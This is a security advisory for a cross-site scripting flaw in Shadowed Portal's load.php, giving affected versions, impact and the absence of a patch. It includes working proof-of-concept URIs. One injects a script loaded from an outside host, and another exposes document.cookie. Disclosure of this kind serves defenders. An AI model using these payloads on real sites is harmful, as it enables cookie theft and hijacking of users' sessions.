Shadowed Portal Load.PHP Cross-Site Scripting Vulnerability
BID:17430
Info
Shadowed Portal Load.PHP Cross-Site Scripting Vulnerability
| Bugtraq ID: | 17430 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 10 2006 12:00AM |
| Updated: | Apr 11 2006 06:42PM |
| Credit: | Liz0ziM is credited with the discovery of this vulnerability. |
| Vulnerable: |
Shadowed Portal Shadowed Portal 5.7d2 Shadowed Portal Shadowed Portal 5.7d1 Shadowed Portal Shadowed Portal 5.7 |
| Not Vulnerable: | |
Discussion
Shadowed Portal Load.PHP Cross-Site Scripting Vulnerability
Shadowed Portal is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
All versions of Shadowed Portal are considered vulnerable at the moment.
Shadowed Portal is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
All versions of Shadowed Portal are considered vulnerable at the moment.
Exploit / POC
Shadowed Portal Load.PHP Cross-Site Scripting Vulnerability
This issue can be exploited through a web client.
The following proof-of-concept URIs are available:
http://www.example.com/path/load.php?mod=pages&page="><script src=http://liz0.li.funpic.org/hacked.js></script>
http://www.example.com/path/load.php?mod=pages&page="><script>alert(/BiyoSecurityTeam/)</script>
http://www.example.com/path/load.php?mod=pages&page="><script>alert(document.cookie)</script>
This issue can be exploited through a web client.
The following proof-of-concept URIs are available:
http://www.example.com/path/load.php?mod=pages&page="><script src=http://liz0.li.funpic.org/hacked.js></script>
http://www.example.com/path/load.php?mod=pages&page="><script>alert(/BiyoSecurityTeam/)</script>
http://www.example.com/path/load.php?mod=pages&page="><script>alert(document.cookie)</script>
Solution / Fix
Shadowed Portal Load.PHP Cross-Site Scripting Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]:[email protected].
References
Shadowed Portal Load.PHP Cross-Site Scripting Vulnerability
References:
References:
- Shadowed Portal Cross Site Scripting (Liz0ziM)
- Shadowed Portal Home Page (Shadowed Portal)